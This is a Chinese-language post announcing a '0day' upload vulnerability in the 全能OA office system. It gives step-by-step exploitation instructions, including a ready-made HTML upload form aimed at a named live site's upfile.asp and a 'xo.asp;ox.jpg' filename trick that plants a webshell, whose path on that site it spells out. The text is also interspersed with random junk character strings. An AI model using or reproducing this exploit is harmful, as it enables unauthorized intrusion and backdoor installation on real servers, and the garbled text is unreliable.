全能OA办公系统0day OA办公系统漏洞 上传漏洞

admin

全能OA办公系统 上传漏洞
​
系统介绍：

全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。
$ P& v* X3 C  a( f# _8 e& ]7 O6 `
主要功能：
  \$ F- s4 I) ?7 V公司通告
7 m" X& Z: K  p0 O  {0 p+ r工作计划
通讯助理
1 ?7 w0 G- T5 R5 ]! I7 a: @' T客户资源
4 E3 D' Y7 B  T8 p9 |. Y* u我的公文
公文传阅
公共资源
资源预约
2 _: L/ C0 G. G8 V; D1 C7 j1 C今日考勤
% S% D# H8 A8 q# u3 \6 |个人计划
9 O* [9 F% _, I$ n个人通讯录
1 [7 P$ W4 Y, ~" b0 D8 \/ H( m个人基本档案
( o( r7 N1 r- G* F3 t# t" R未读邮件
发邮件
% ~  X& E. ?/ w( h9 T5 h收件夹
寄件夹
* n8 |) A+ V; {( d& ~6 B* u% V7 ]5 y网络硬盘
! ~: L, t6 [% D' [网络会议
9 c6 F) d: X) t* \* G  H5 t网络调查
5 C7 h" \) V9 Z+ T" _. {交流论坛

有兴趣测试的朋友可以下源码看看
0 t* S& C3 f3 ]9 }0 ]" \2 d
源码下载：
. i% y: R+ W; N  T
; `2 _5 j3 m# b  ~; e- }http://www.mycodes.net/30/4750.htm
/ \% W9 O9 d  e7 p) R/ J' t" H6 U
1 @' O3 [* g6 _- x漏洞介绍：
, ?; P- u; J1 k3 c5 w2 T
由upfile.asp上传文件漏洞引起

/ y) d: Z7 v8 ^1 L1 m测试方法：
" E' b3 S( ~. m- ^  C7 u7 W+ ]
使用名小子上传http://www.itlynn.com/upfile.asp即可
8 h2 H8 i/ m3 I+ I3 P4 Y7 q* ^  q
如果upfile.asp文件被删除不存在。

6 F0 W. l/ |! Y( k9 S+ v* }/ r: Y  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。

/ A( {# r( X. [* _! D如果存在那么将如下代码保存为upfile.html。

9 g3 c: U- j& e: a2 U+ W! V然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
- b$ A" Y' T+ R; p) Q9 }

3 a" S9 M9 N, }; f' T
0 |; f* t% E7 J! [/ Q; l01 <table border='0' align="center" cellpadding="5">
1 W* }, u8 L, E8 ^( C# w
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">

03 <tr>

) U3 ^. u/ ~! O! F' j( l. [$ a04             <td>报错：</td>

8 w# a+ r& z6 J* d05             <td><input type='radio' name='errnumber' value='0'>

06               自动更名
5 K$ V  @* Z% L# ?
07               <input type='radio' name='errnumber' value='1' checked>

5 s0 |, D* g' r7 ]3 v8 h4 M& x; g08               报错方式

09               <input type='radio' name='errnumber' value='2'>
+ |; p) e5 I' ^$ V+ d$ r
5 U: ^! n. \  q. S7 |10               直接覆盖</td>

* n: X! m$ Y+ \6 x8 k# u9 t9 i3 U& j11           </tr>
  h9 w6 Z' [2 E* w
12           <tr>
, X9 N3 K" }0 q' L
  X& G' K* z1 o+ n0 }; r13             <td>主题：</td>

) k( h" }) T. s: w14             <td><input type='text' name='filename' size='30'></td>

! O' v( {; `& z: g1 \& j' R15           </tr>
" V8 Q6 T  }2 G3 |  x! o
16           <tr>
( N* [- ?3 P: l  c
17             <td>文件：</td>
& k% g5 e" K0 D: X1 x: }
: [6 ]! l" q: S* O% i18             <td><input type="file"name="fruit"size="30"></td>
7 d3 H3 h) j9 `
19           </tr>
) Z5 Y* k# I- e* B1 [# Q
20           <tr>

0 f( f3 _+ Z) ]2 b" a5 S3 i21             <td valign='top'>简介：</td>

. m6 a' e4 g' {7 r22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
% F" q$ [' b# {" E8 Y2 s
4 ?( E/ u8 W" B; }) A* c23           </tr>
5 S- ^: Y- g7 h, v7 X: ^& R
24   

$ V" f8 o7 R# P. s7 Z4 I25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>

26           </tr>
: i' R. P5 n1 U5 \6 \7 ]
# K, Z" b' Y" e  @; a1 G2 B27         </form>

然后打开上传一个文件名为xo.asp;ox.jpg的文件。

% s! ^$ `1 b1 W# g$ F

! H! U9 o" \$ M: ]上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg

此漏洞需要配合解析漏洞利用。

; |; H. G% ]: v( i4 N; V# J$ E